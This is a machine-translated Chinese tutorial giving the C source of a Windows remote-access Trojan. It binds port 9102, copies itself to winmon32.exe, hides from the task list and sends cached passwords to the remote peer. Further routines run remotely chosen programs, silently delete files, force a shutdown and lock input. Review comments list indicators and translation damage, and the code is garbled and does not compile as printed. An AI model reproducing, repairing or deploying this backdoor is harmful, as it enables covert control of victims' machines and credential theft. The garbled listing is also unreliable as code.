A simple Trojan example. When I write articles I generally just give the source code. Except for the key sections, I prefer not to add much explanatory text, because the code itself is more practical; for the individual functions, consult a reference book, which covers them in detail.
The example below uses asynchronous socket mode and calls the Winsock API directly. It is a Trojan written against the Win SDK (debugged and working under VC and C++ Builder); it needs no client and compiles to a few dozen KB. It implements the main functions: file browsing, upload, download (all with wildcard support), changing the directory, getting system information, retrieving passwords, executing files, displaying processes, sending messages, shutdown, and some control functions, and it can be used on Win 9x and NT/2000. Under NT/2000 a program that depends on cmd.exe becomes useless when cmd.exe has been renamed or does not exist, so nothing here calls cmd.exe; everything is implemented directly with the Win API, for those who are not afraid of the extra trouble. Friends who write Trojans and network communication programs with ready-made controls are advised to become familiar with these fundamentals, especially in network communication. If you are a programmer, I do not need to tell you this: in development work I have not seen a company that builds everything from ready-made class libraries (MFC, VCL).
This program is still not very robust. After writing it I have not had time to tidy and optimize it; it is mainly meant to make everyone familiar with Winsock and Win SDK programming.
/ / -------------------------------------------------------------------------------------------- --------------------------- // WINSOCK API, WIN SDK programming, no client // // author: Jia Jia // - -------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
#include
#include
#include
#pragma HDRSTOP
#include
#pragma argsused
// NOTE(review): this listing was damaged by machine translation (identifier case changed, operators
// dropped, header names after #include lost, several #defines fused onto comment lines); it does not
// compile as printed. The doubled slashes in the strings are presumably altered backslashes.
// Constants a defender can use as indicators for this sample:
//   - "winmon32.exe": the file name WinMain appends to the system directory before copying the
//     running executable there.
//   - 9102: the TCP port InitSocket binds to and listens on.
//   - "Lanlan: //>": the prompt text sent to the connected peer after every command.
// dwbuffsize (2048) sizes the heap buffers used by the cached-password routine; dwcomm (50) sizes
// the command buffers in WndProc.
#define run "//winmon32.exe"
// Register #define service_proc 1 // Uninstall service #define unservice_proc 0
#define th32cs_snapprocess 0x00000002 #define process_handle_name 255
// Buffer length #define dwbuffsize 2048 // Command line length #define dwcomm 50 #define port 9102 #define wm_socket wm_user 1 #define Prompt "Lanlan: //>"
// File-level state shared by every handler in this listing.
//   createsock  - the listening socket created in InitSocket.
//   news        - the accepted connection (spelled NewSock elsewhere in the listing); every routine
//                 writes its output to this one socket, so only one peer is tracked at a time.
//   szreadbuff, ob, tempBuff - scratch buffers allocated and freed in getCachePW and used by GetPass.
// The structure and callback typedefs below describe the entries handed to the callback of the
// WNetEnumCachedPasswords export of mpr.dll (resolved by name in getCachePW).
// The ToolHelp32, PSAPI and RegisterServiceProcess entry points are declared as function pointers
// and filled in at run time with LoadLibrary/GetProcAddress. A binary built this way would not list
// those functions in its import table, but the export names remain in it as plain strings.
DWord dwversion = makeword (1); dword dwflag = true; wsadata wsadata; socket createsock, news; sockaddr_in sock_in, newsock_in; lptstr szreadbuff, ob, tempBuff; int Addrlen;
// Cache Password structure typef strunt tagpassword_cache_entry {Word CBENTRY; Word CBRESOURCE; Word Cbpassword; Byte IEntry; Byte NTYPE; CHAR ABRESOURCE [1];} password_cache_entry;
TypeDef Bool (WinAPI * CacheCallback) (Password_cache_entry * PCE, DWORD);
// cache password function original TypedEf Word (WinApi * Pwneetenucached, DWORD CBPREFIX, DWORD NTYPE, CACHECALLBACK PFNCALLBACK, DWORD UNKNOWN);
// TOOLHELP32 structure typedef struct tagPROCESSENTRY32 {DWORD dwSize; DWORD cntUsage; DWORD th32ProcessID; DWORD th32DefaultHeapID; DWORD th32ModuleID; DWORD cntThreads; DWORD th32ParentProcessID; LONG pcPriClassBase; DWORD dwFlags; TCHAR szExeFile [MAX_PATH];} PROCESSENTRY32; typedef PROCESSENTRY32 * LPPROCESSENTRY32;
// define TOOLHELP32, PSAPI function pointer HANDLE (WINAPI * CreateToolhelp32Snapshot) (DWORD dwFlags, DWORD th32PD); BOOL (WINAPI * Process32First) (HANDLE hSnapshot, LPPROCESSENTRY32 pe); BOOL (WINAPI * Process32Next) (HANDLE hSnapshot, LPPROCESSENTRY32 pe); BOOL (WINAPI * EnumProcesses) (DWORD * lpidProcess, DWORD cb, DWORD * cbNeeded); DWORD (WINAPI * GetModuleFileNameExA) (HANDLE hProcess, HMODULE hModule, LPTSTR lpstrFileName, DWORD nSize);
Hinstance Dllinst; DWORD (WinAPI * RegisterServiceProcess) (DWORD, DWORD);
/ / -------------------------------------------------------------------------------------------- --------------------------- // Getos // Judgment Operating System // ------------- -------------------------------------------------- ----------------
// Reports which Windows family the program is running on.
// Fills an OSVERSIONINFO with GetVersionEx and returns its platform id for the two cases handled:
// VER_PLATFORM_WIN32_WINDOWS (Win 9x) or VER_PLATFORM_WIN32_NT (NT/2000). Callers use the result to
// choose between the 9x-only and NT-only code paths.
// NOTE(review): the switch has no default, so for any other platform id the function reaches its end
// without a return statement. The local Sversion buffer is declared but never used.
DWORD WINAPI Getos () {OsversionInfo OS; Tchar Sversion [MAX_PATH];
Os.dwosveionsInfosize = SizeOf (OsversionInfo); GetversionEx (& OS); Switch (Os.dwplatformID) {CASE VER_PLATFORM_WIN32_WINDOWS: RETURN VER_PLATFORM_WIN32_WINDOWS;
Case Ver_Platform_Win32_NT: RETURN VER_PLATFORM_WIN32_NT;}}
/ / -------------------------------------------------------------------------------------------- --------------------------- // hideproc // Registration process // -------------- -------------------------------------------------- -----------
// Registers or unregisters the current process as a "service process".
// Loads KERNEL32.DLL, resolves RegisterServiceProcess by name and calls it for the current process
// id; returns TRUE when the export was found and called, FALSE otherwise. WinMain calls this only
// when Getos reports Windows 9x, and WndProc calls it again on WM_DESTROY.
// On Windows 9x a process registered this way is left out of the Close Program (Ctrl+Alt+Del) list,
// which is presumably why the author named it HideProc. The process is still returned by a ToolHelp32
// snapshot, so a process listing built on that API is the more reliable view on such hosts.
// NOTE(review): as printed, the call passes only the process id and `mode` is never used; the second
// argument appears to have been lost in translation. The library handle is not released here.
BOOL WINAPI HideProc (int mode) {DLLInst = LoadLibrary ( "KERNEL32.DLL"); if (DLLInst) {RegisterServiceProcess = (DWORD (WINAPI *) (DWORD, DWORD)) GetProcAddress (DLLInst, "RegisterServiceProcess"); if (RegisterServiceProcess {RegisterServiceProcess (GetCurrentProcessid (); return true;} else return false;} else returnaf false;} // ----------------------- -------------------------------------------------- - // enumprocess // enumeration process / / -------------------------------------- -------------------------------------
// Resolves the three ToolHelp32 entry points used by EnumProcess on Windows 9x.
// Loads KERNEL32.DLL and stores the addresses of CreateToolhelp32Snapshot, Process32First and
// Process32Next in the file-level function pointers. Returns FALSE when the library cannot be
// loaded or any of the three lookups fails.
// NOTE(review): the success branch is printed as a bare `return;` (its value was lost), and the
// module handle obtained from LoadLibrary is never released in the visible code.
// Initialization TOOLHELP32 BOOL InitToolHelp32 () {HINSTANCE DLLinst = LoadLibrary ( "KERNEL32.DLL"); if (DLLinst) {CreateToolhelp32Snapshot = (HANDLE (WINAPI *) (DWORD dwFlags, DWORD th32PD)) GetProcAddress (DLLinst, "CreateToolhelp32Snapshot") ; Process32First = (BOOL (WINAPI *) (HANDLE hSnapshot, LPPROCESSENTRY32 pe)) GetProcAddress (DLLinst, "Process32First"); Process32Next = (BOOL (WINAPI *) (HANDLE hSnapshot, LPPROCESSENTRY32 pe)) GetProcAddress (DLLinst, "Process32Next") ; if (! (uint) createtoolhelp32snapshot) || (! (uint) process32first) || (! (uint) process32next) Return False; else return;} return false;}
// Resolves the two PSAPI entry points used by EnumProcess on Windows NT/2000.
// Loads PSAPI.DLL and stores the addresses of EnumProcesses and GetModuleFileNameExA in the
// file-level function pointers. Returns FALSE when the library is missing or a lookup fails,
// TRUE otherwise.
// NOTE(review): the null check as printed names getModuleFileName rather than the pointer that was
// just assigned, and the function's closing brace is missing from the listing; both look like
// translation damage. The PSAPI module handle is never released in the visible code.
// Initialization PSAPI BOOL InitPSAPI () {HINSTANCE PSAPI = LoadLibrary ( "PSAPI.DLL"); if (NULL == PSAPI) return FALSE; EnumProcesses = (BOOL (WINAPI *) (DWORD * lpidProcess, DWORD cb, DWORD * cbNeeded )) GetProcAddress (PSAPI, "EnumProcesses"); GetModuleFileNameExA = (DWORD (WINAPI *) (HANDLE hProcess, HMODULE hModule, LPTSTR lpstrFileName, DWORD nSize)) GetProcAddress (PSAPI, "GetModuleFileNameExA"); if (NULL == EnumProcesses || NULL == getModuleFileName) Return False; Else Return True;
// Sends the list of running processes to the connected peer.
// Writes a heading to NewSock, then branches on Getos():
//   - Windows 9x: takes a ToolHelp32 snapshot and sends the executable name of each entry.
//   - Windows NT/2000: calls EnumProcesses for up to 255 ids, opens each process for query and
//     VM read, and sends the module file name returned by GetModuleFileNameExA.
// All output goes to the socket only; nothing is displayed on the local machine.
// NOTE(review): in the 9x loop each process is opened with terminate access and the handle is
// neither used nor closed; no TerminateProcess call is visible in this listing. No `break` is
// printed between the 9x case and the NT case. The NT `for` header is cut off after "i" and the
// array index on Process_IDS is missing, so the loop bounds cannot be read from this page.
VOID WINAPI EnumProcess () {HANDLE process [255]; PROCESSENTRY32 p32; DWORD process_ids [255]; DWORD num_processes; TCHAR file_name [MAX_PATH]; TCHAR szTemp [MAX_PATH]; unsigned i; wsprintf (szTemp, "/ n / n / r << Process File Name >> / N / N / R "); Send (Newsock, Sztemp, Lstrlen (SzTemp), 0);
switch (GetOS ()) {case VER_PLATFORM_WIN32_WINDOWS: if (InitToolHelp32 ()) {p32.dwSize = sizeof (PROCESSENTRY32); HANDLE pName = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, NULL); BOOL Next = Process32First (pName, & p32); i = 0; While (Next) {WSPrintf (Sztemp, "Process filename:% s /n/r" ,p32.szexefile); Send (NewSock, Sztemp, Lstrlen (Sztemp), 0); Process = OpenProcess (Process_Terminate, 0, P32. Th32ProcessID; Next = Process32Next (PNAME, & P32); i ;} closehandle (pname);
CASE VER_PLATFORM_WIN32_NT: IF (INTPSAPI ()) {EnumProcesses (Process_IDS, SIZEOF (Process_IDS), & Num_Processes); for (i = 0; i
{
Process = OpenProcess (Process_Query_Information | Process_VM_READ
, 0, Process_IDS;
IF (GetModuleFileNameExa (Process, Null, File_Name, Sizeof (file_name)))
WSPRINTF (SzTemp, "Process FileName:% S / N / R", File_Name);
Send (Newsock, Sztemp, Lstrlen (SzTemp), 0);
}
CloseHandle (Process);
}
Break;
}
}
/ / -------------------------------------------------------------------------------------------- --------------------------- // getcachepw // take cache password // ----------- -------------------------------------------------- ----------------
// Callback invoked once per cached-password entry by WNetEnumCachedPasswords (see getCachePW).
// Copies the entry's resource name (cbResource bytes of abResource) into szReadBuff, converts it
// with CharToOem and formats it as the "UserName" field; then does the same for the cbPassword
// bytes that follow the resource name and appends them as the "Password" field. The combined text
// is sent to NewSock. Always returns TRUE, which lets the enumeration continue.
// The credentials leave the host as plain text on the control connection; no encryption is applied
// anywhere in this listing, so the exchange is readable in a packet capture.
// NOTE(review): neither cbResource nor cbPassword is checked against the 2048-byte buffers, and the
// send passes dwbuffsize as the length, so the whole buffer is transmitted rather than the string.
BOOL CALLBACK GetPass (PASSWORD_CACHE_ENTRY * pce, DWORD) {MoveMemory (szReadBuff, pce-> abResource, pce-> cbResource); szReadBuff [pce-> cbResource] = 0; CharToOem (szReadBuff, Ob); wsprintf (TempBuff, "/ n / N / R (UserName):% S / N / R (Password): ", OB); MoveMemory (SzreadBuff, PCE-> Abresource PCE-> CBRESOURCE, PCE-> CBPassword); szreadbuff [PCE-> Cbpassword] = 0; chartooem (szreadbuff, ob); LSTRCAT (TEMPBUFF, OB); Send (Newsock, Tempbuff, dwbuffsize, 0); return true;}
// Enumerates the Windows 9x password cache and sends every entry to the connected peer.
// Loads mpr.dll, resolves the WNetEnumCachedPasswords export by name, allocates three zeroed
// 2048-byte heap buffers (szReadBuff, Ob, TempBuff), runs the enumeration with GetPass as the
// callback, then frees the buffers and the library. Returns FALSE if mpr.dll or the export is
// unavailable, TRUE otherwise.
// The heading sent to the peer labels this as a Win 9x feature; the export is looked up at run time,
// so the function simply returns FALSE on systems whose mpr.dll does not provide it. Where password
// caching is disabled on a 9x host there are presumably no entries for the callback to receive.
// NOTE(review): the HeapAlloc results are not checked; HeapFree is given dwBuffSize where the API
// expects a flags value; the early return for a missing export leaves mpr.dll loaded. The function's
// closing brace is missing from the listing.
Bool WinAPI getCachePW () {tchar sztemp [max_path];
PWNETENUMCACHEDPASSWORDS WNETENUMCACHEDPASSWORDS; Hinstance Dllinst = LoadLibrary ("mpr.dll"); if (! Dllinst) {Return False;}
WSPrintf (Sztemp, "/ N / N / R << Win 9X Cache Password >> / N / R"); Send (Newsock, Sztemp, Lstrlen (SzTemp), 0);
WNetEnumCachedPasswords = (PWNetEnumCachedPasswords) GetProcAddress (DLLinst, "WNetEnumCachedPasswords"); if (WNetEnumCachedPasswords!) {Return FALSE;} else {szReadBuff = (LPTSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, dwBuffSize); Ob = (LPTSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, dwBuffSize); TempBuff = (LPTSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, dwBuffSize); WNetEnumCachedPasswords (0,0,0xff, GetPass, 0); HeapFree (GetProcessHeap (), dwBuffSize, szReadBuff); HeapFree ( GetProcessHeap (), dwbuffsize, ob); HeapFree (getProcessHeap (), dwbuffsize, tempbuff); freeElibrary (DLLINST);} return true;
/ / -------------------------------------------------------------------------------------------- --------------------------- // LoadProcess // Execute Document / / -------------- -------------------------------------------------- -----------
// Starts the program named by szFileName as a new process.
// Zeroes STARTUPINFO and PROCESS_INFORMATION, requests a normally shown window, and calls
// CreateProcess with szFileName as the application name and no command line. Returns FALSE when
// CreateProcess fails, TRUE otherwise.
// The only caller in this listing is the "Execfile" branch of Execommand, which passes text received
// from the network connection, so the remote peer chooses what is run. The child is created by this
// program, so process-creation records on the host would show it as the parent.
// NOTE(review): the process and thread handles returned in pi are never closed; the closing brace is
// missing from the listing.
Bool WinApi LoadProcess (LPCTSTSTR SZFILENAME) {Startupinfo Si; Process_information Pi;
ZeroMemory (& si, sizeof (STARTUPINFO)); ZeroMemory (& pi, sizeof (PROCESS_INFORMATION)); si.cb = sizeof (STARTUPINFO); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (CreateProcess (szFileName, NULL, NULL , NULL, FALSE, 0, NULL, NULL, & Si, & PI) == false {Return False;} Return True;
/ / -------------------------------------------------------------------------------------------- --------------------------- // DIR // Browse file, support unparallerage // --------- -------------------------------------------------- ----------------
// Sends a directory listing for the pattern in lParam to the connected peer.
// Copies the pattern into szFileName, walks the matches with FindFirstFile/FindNextFile and, for
// each entry, formats the name and size into the same buffer and sends it to NewSock. When the
// first search fails it sends "Can Not Find Directory or Files" instead.
// NOTE(review): the switch compares dwFileAttributes with single attribute constants, so an entry
// carrying more than one attribute bit matches no case and is not listed. Every non-directory case
// prints the label ARCHIVE, including the hidden, read-only and system cases. The pattern is copied
// with lstrcpy into a MAX_PATH buffer without a length check, and no FindClose call is visible.
// The condition on FindFirstFile and one format string are broken across lines by the translation.
Void WinAPI Dir (LPCTSTR LPARAM) {Win32_Find_Data WFD; Handle Hhandle; Tchar SzFileName [MAX_PATH]; INT I;
WSPrintf (SZFileName, "/ N / N / R"); Send (Newsock, SzFileName, Lstrlen (SzFileName), 0);
LSTRCPY (SZFileName, LPARAM);
if (! (hHandle = FindFirstFile (szFileName, & wfd)) = INVALID_HANDLE_VALUE) {do {switch (wfd.dwFileAttributes) {case FILE_ATTRIBUTE_ARCHIVE: if (wfd.nFileSizeHigh == 0) wsprintf (szFileName, "% - 20s% 10lu ARCHIVE / N / R ", wfd.cfilename, wfd.nfilesizelow; else WSPrintf (SZFileName,"% - 20S% 10lu Archive / N / R ", wfd.cfilename, wfd.nfilesizehigh wfd.nfilesizerow); Send (Newsock, SzFileName , lstrlen (szfilename), 0); Break; case file_attribute_directory: WSPrintf (SZFileName, "% - 20S% 10lu
/n/r",wfd.cFileName,wfd.nFileSizeLow); send (NewSock, szFileName, lstrlen (szFileName), 0); break; case FILE_ATTRIBUTE_HIDDEN: if (wfd.nFileSizeHigh == 0) wsprintf (szFileName, "% - 20S% 10lu Archive / N / R ", wfd.cfilename, wfd.nfilesizelow; Else Wsprintf (SZFileName,"% - 20S% 10lu Archive / N / R ", wfd.cfilename, wfd.nfilesizehigh wfd.nfilesizelow); send (NewSock, szFileName, lstrlen (szFileName), 0); break; case FILE_ATTRIBUTE_READONLY: if (wfd.nFileSizeHigh == 0) wsprintf (szFileName, "% - 20s% 10lu ARCHIVE / n / r", wfd.cFileName, wfd .nFileSizeLow); else wsprintf (szFileName, "% - 20s% 10lu ARCHIVE / n / r", wfd.cFileName, wfd.nFileSizeHigh wfd.nFileSizeLow); send (NewSock, szFileName, lstrlen (szFileName), 0); break Case file_attribute_system: if (wfd.nfilesizehigh == 0) WSPrintf (SZFileName, "% - 20S% 10lu Archive / N / R", wfd.cfilename, wfd.nfilesizelow; Else Wsprintf (SZFileName, "% - 20S% 10lu Archive / N / R ", wfd.cfilename, wfd.nfilesizehigh wfd.nfilesizelow; send (newsock, szfilename, lstrlen (szfilename), 0); Break;}} while (FindnextFile (HHHANDLE, & WFD)); } else {WSPrintf (SZFileName, "Can Not Find Directory or Files./N/R"); Send (Newsock, SzFileName, Lstrlen (SzFileName), 0);}} // ---------- -------------------------------------------------- --------------- // FileOpertion // File Operation Function / / ------------------------- --------------------------------------------------
// Shared helper behind Delete, Copy and Ren: runs one shell file operation.
// Copies the two path arguments into local MAX_PATH buffers, writes an extra terminator after each
// (SHFileOperation expects its path lists to end with two NUL characters), fills a SHFILEOPSTRUCT
// with `opt` as the operation code and calls SHFileOperation. Returns FALSE when the shell reports
// an error, TRUE otherwise.
// The flag set includes FOF_SILENT, FOF_NOCONFIRMATION and FOF_NOCONFIRMMKDIR, so no progress or
// confirmation dialog is shown to the logged-on user. FOF_ALLOWUNDO is also set, which means deleted
// files may be placed in the Recycle Bin rather than removed outright - worth checking during triage.
// NOTE(review): both lstrcpy calls are unbounded, and the "+" in the terminator index expressions
// was lost in translation.
Bool WinAPI FileOpertion (lpctstr szfilename1, lpctstr szfilename2, dword opt) {shfileopstruct shf; tchar sr [max_path]; tchar de [MAX_PATH];
LSTRCPY (SR, SZFileName1); SR [LSTRLEN (SR) 1] = '/ 0'; LSTRCPY (DE, SZFileName2); DE [LSTRLEN (DE) 1] = '/ 0';
ZeroMemory (& shf, sizeof (shf)); shf.hwnd = NULL; shf.wFunc = opt; shf.pFrom = sr; shf.pTo = de; shf.fFlags = FOF_ALLOWUNDO | FOF_SILENT | FOF_FILESONLY | FOF_MULTIDESTFILES | FOF_NOCONFIRMATION | FOF_NOCONFIRMMKDIR; IF (SHFILEOPERATION (& SHF)) Return False; Else Return True;}
/ / -------------------------------------------------------------------------------------------- --------------------------- // delete // Delete files (hidden, read-only), directory, support unparallerts // -------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
// Deletes the file or directory named by lParam through FileOpertion and reports the outcome to the
// connected peer ("Delete File IS OK" / "Delete File IS Fail").
// NOTE(review): the argument list of the FileOpertion call and the flags argument of the first send
// were lost in translation, as was the function's closing brace; the operation code used for the
// delete is therefore not visible on this page.
Void WinAPI Delete (LPCTSTR LPARAM) {if (! FileOpertion)) Send (Newsock, "Delete File IS Fail", 20); Else Send (Newsock, "Delete File IS OK", 17 , 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // Copy // Copy, upload, download file (you need to set your hard drive to completely sharing), Support Uniform // -------------------------------------------- -------------------------------
// Copies lParam1 to lParam2 through FileOpertion with FO_COPY and reports the outcome to the
// connected peer ("Copy File IS OK" / "Copy File IS Fail").
// The section heading describes this as the upload/download mechanism and says it relies on the
// drive being fully shared, i.e. the transfer is an ordinary file copy to or from a network path
// rather than data sent over the control socket.
// NOTE(review): the parameter types and the closing brace are garbled in the listing.
Void WinApi Copy (LPCTSTSTR LPARAM1, LPCTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTSTER LPARAM2) {IF (! FileOpertion (LPARAM1, LPARAM2, FO_COPY) Send (Newsock, "Copy File IS Fail", 18, 0); Else Send (Newsock, "Copy File IS OK" 15, 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // Ren // file, directory is renamed // ----------- -------------------------------------------------- ----------------
// Renames lParam1 to lParam2 through FileOpertion with FO_RENAME and reports the outcome to the
// connected peer.
// NOTE(review): the two status strings are misspelled in the listing ("Renname", "Reanme"); they are
// runtime text and are left as printed. The parameter types and closing brace are garbled.
Void WinAPI Ren (LPCTSTSTR LPARAM1, LPCTSTSTSTSTSTSTSTSTR LPARAM2) {IF (! FileOpertion (LPARAM1, LPARAM2, FO_RENAME)) Send (Newsock, "Renname File IS Fail", 21, 0); Else Send (Newsock, "Reanme File IS OK" , 18, 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // GetsysInfo // Get System Information / / ------------- -------------------------------------------------- ----------------
// Collects basic host information and sends it to the connected peer, one item per send:
// computer name, operating-system family (from Getos), total physical memory in megabytes, the
// Windows and system directories, and - for each of 26 drive letters - the drive type, with the
// file-system name added for fixed and network drives.
// Everything is sent as plain text on the control connection.
// NOTE(review): szFileSys holds 10 characters but GetVolumeInformation is told the buffer is
// MAX_PATH long. The heading string, the loop increment and the drive-root format string are
// damaged in the listing, and one `case` label is printed as "copy".
Void WinApi getsysinfo () {tchar szbuff [MAX_PATH]; tchar sztemp [max_path];
WSPrintf (SZBuff, "/ N / N / R <
> / n / N / r ");
Send (Newsock, SzBuff, Lstrlen (SzBuff), 0);
// Computer name DWord len = sizeof (sztemp); getcomputername (sztemp, & len); WSPrintf (SZBuff, "Computer Name:% S / N / N / R", SzTemp); Send (Newsock, SzBuff, Lstrlen (SZBuff) , 0);
// current operating system switch (GetOS ()) {case VER_PLATFORM_WIN32_WINDOWS: lstrcpy (szTemp, "Windows 9x"); break; case VER_PLATFORM_WIN32_NT: lstrcpy (szTemp, "Windows NT / 2000"); break;} wsprintf (szBuff, " Option System:% S / N / N / R ", SZTEMP); Send (Newsock, SZBuff, Lstrlen (SZBuff), 0);
// memory capacity MemoryStatus mem; mem.dwlength = sizeof (MEM); GlobalMemoryStatus (& MEM); WSPrintf (SZBuff, "Total Memroy:% DM / N / N / R", Mem.dwtotalphys / 1024/1024 1); Send (Newsock, SzBuff, Lstrlen (SzBuff), 0);
// system directory TCHAR szPath [MAX_PATH]; GetWindowsDirectory (szTemp, sizeof (szTemp)); GetSystemDirectory (szBuff, sizeof (szBuff)); wsprintf (szPath, "Windows Directory:% s / n / n / rSystem Directory:% s / N / N / R ", SZTEMP, SZBUFF; Send (Newsock, Szpath, Lstrlen (Szpath), 0);
// Drive and Partition Type Tchar SzFileSys [10];
For (int i = 0; i <26; i) {wsprintf (sztemp, "% c: //////////); uint utype = getDriveType (sztemp); switch (utype) {copy drive_fixed : GetVolumeInformation (Sztemp, Null, Null, Null, Null, Null, SzFilesys, Max_Path; WSPrintf (SZBuff, "Hard Disk:% S (% s) / N / N / R", SZTEMP, SZFILESYS); Send (Newsock , SZBuff, LSTRLEN (SZBUFF), 0); Break; Case Drive_CDROM: WSPrintf (SZBuff, "CD-ROM Disk:% S / N / N / R", SZTEMP; Send (Newsock, Szbuff, Lstrlen (SzBuff), 0); Break; Case Drive_Remote: GetVolumeInformation (Sztemp, Null, Null, Null, Null, Null, SzFilesys, Max_Path); WSPrintf (SZBuff, "Network Disk:% s (% s) / n / n / r", Sztemp , SZFILESYS); Send (Newsock, SzBuff, Lstrlen (SZBuff), 0); Break;}}
}
// Shuts the machine down on request from the connected peer.
// On Windows 9x it calls ExitWindowsEx directly with a flags value of 1. On NT/2000 it first opens
// its own process token, looks up SE_SHUTDOWN_NAME and enables that privilege with
// AdjustTokenPrivileges, then calls ExitWindowsEx with EWX_FORCE | EWX_POWEROFF. EWX_FORCE means
// running applications are not given the chance to block the shutdown, so unsaved work is lost.
// NOTE(review): the return values of OpenProcess, OpenProcessToken and LookupPrivilegeValue are not
// checked, and neither handle is closed. The function header is fused onto the banner comment line
// in this listing.
/ / -------------------------------------------------------------------------------------------- --------------------------- // EXITWIN / / Turn off the computer (Win 9X, NT / 2000) // ------ -------------------------------------------------- ------------------- Void WinApi EXITWIN () {DWORD DWVER; HANDLE HPROCESS, HTOKEN; Token_Privieges NewState; DWORD ProcessId, ReturnLength = 0; Luid LuidPrivileEluid;
DWVER = Getos (); if (dwver == ver_platform_win32_windows) EXITWINDOWSEX (1,0);
else if (dwVer == VER_PLATFORM_WIN32_NT) {ProcessId = GetCurrentProcessId (); hProcess = OpenProcess (PROCESS_ALL_ACCESS, FALSE, ProcessId); OpenProcessToken (hProcess, TOKEN_ADJUST_PRIVILEGES, & hToken); LookupPrivilegeValue (NULL, SE_SHUTDOWN_NAME, & luidPrivilegeLUID);
NewState.privilegegount = 1; newState.privileges [0] .luid = LuidPrivileGeluid; newState.privileges [0] .attributes = se_privilege_enable;
IF (AdjustTokenprivileges (Htoken, False, & NewState, Null, Null, NULL) EXITWINDOWSEX (EWX_FORCE | EWX_Poweroff, 0);}}
/ / -------------------------------------------------------------------------------------------- --------------------------- // Ctrlcd / / Optical drive control // -------------- -------------------------------------------------- -----------
// Opens or closes the CD-ROM tray by sending an MCI command string ("set cdaudio door open/closed
// wait") through mciSendString. Ctrl selects the action; hWnd is passed as the MCI callback window.
// NOTE(review): the first case label has lost its value in the listing (presumably TRUE, since the
// other label is FALSE), and the return value of mciSendString is ignored.
Void WinAPI Ctrlcd (HWND HWND, BOOL CTRL) {Switch (Ctrl) {Case: McISendstring ("Set CDAudio Door Open Wait", NULL, 0, HWND); Break; Case False: McIndString ("Set Cdaudio Door Closed Wait" , NULL, 0, HWND; Break;}}
/ / -------------------------------------------------------------------------------------------- --------------------------- // Popmsg // Send message // -------------- -------------------------------------------------- -----------
// Shows `message` in a message box titled "popmsg" with a single OK button, owned by hWnd.
// Called from the "Popmsg" branch of Execommand with text received from the network connection, so
// the wording on screen is chosen by the remote peer. MessageBox blocks until the box is dismissed;
// here that happens inside the window procedure's handling of the socket message.
// NOTE(review): the closing brace is missing from the listing.
Void WinAPI Popmsg (lpctstr message, hwnd hwnd) {MessageBox (hwnd, message, "popmsg", mb_ok);
// Changes the process's current directory to szDir with SetCurrentDirectory and returns TRUE on
// success, FALSE on failure. Later commands that take relative paths (for example the default
// "*.*" listing in the Dir branch of Execommand) are resolved against this directory.
// The function header is fused onto the banner comment line in this listing.
/ / -------------------------------------------------------------------------------------------- --------------------------- // ChangDir // Change the current directory // ------------- -------------------------------------------------- ------------ BOOL WINAPI CHANGEDIR (LPCTSTR SZDIR) {IF (SetCurrentDirectory (SZDIR)) Return True; Else Return False;}
/ / -------------------------------------------------------------------------------------------- --------------------------- // getCurpath // Get the current directory / / ------------- -------------------------------------------------- ----------------
// Sends the process's current directory to the connected peer.
// Reads it with GetCurrentDirectory into a MAX_PATH buffer, formats it after a fixed label and
// sends the result to NewSock.
// NOTE(review): the formatted text is the label plus a path of up to MAX_PATH characters, written
// into a second MAX_PATH buffer, so a long path can exceed it. The buffer name is spelled two ways
// and the closing brace is missing in the listing.
Void WinAPI getCurpath () {tchar lpbuff [max_path]; tchar sztemp [max_path];
GetCurrentDirectory (MAX_PATH, LPBUF); WSPrintf (Sztemp, "CurrentDirect:% S / N / R", LPBUFF); Send (Newsock, Sztemp, Lstrlen (SzTemp), 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // hssys // Show, hidden desktop, taskbar // --------- -------------------------------------------------- ----------------
// Hides (Ctrl == FALSE) or shows (Ctrl == TRUE) the desktop and the taskbar.
// Looks up the window of class "Progman" and the taskbar window by class name with FindWindow and
// calls ShowWindow with SW_HIDE or SW_SHOW on each. The hWnd parameter is overwritten by the
// FindWindow results, so the caller's value is not used.
// The change is purely visual and lasts until the windows are shown again or the shell restarts;
// no file or registry state is touched here.
// NOTE(review): the taskbar class name is garbled in the listing ("sh * ll _trayWnd"), and the
// FindWindow results are not checked before use.
Void WinApi Hssys (HWND HWND, BOOL CTRL) {Switch (Ctrl) {Case False: HWnd = FindWindow ("Progman", NULL); ShowWindow (hwnd, sw_hide); hWnd = FindWindow ("sh * ll _trayWnd", NULL) ; ShowWindow (hWnd, SW_HIDE); break; case TRUE: hWnd = FindWindow ( "Progman", NULL); ShowWindow (hWnd, SW_SHOW); hWnd = FindWindow ( "Sh * ll _TrayWnd", NULL); ShowWindow (hWnd, SW_SHOW Break;}}
/ / -------------------------------------------------------------------------------------------- --------------------------- // LockMK // Lock mouse, function keys / / ----------- -------------------------------------------------- ----------------
// Locks (Ctrl == TRUE) or releases (Ctrl == FALSE) the mouse and the system key combinations.
// Locking confines the cursor with ClipCursor to a zeroed rectangle and sets
// SPI_SCREENSAVERRUNNING and SPI_SETFASTTASKSWITCH through SystemParametersInfo; releasing passes
// NULL to ClipCursor and clears both settings. On Windows 9x, telling the system a screen saver is
// running is known to suppress Ctrl+Alt+Del and Alt+Tab handling, which matches the "function keys"
// wording of the heading.
// Nothing here is written to disk, so the visible code suggests the effect does not outlast the session.
// NOTE(review): return values are ignored; the banner for the next section is fused onto this line.
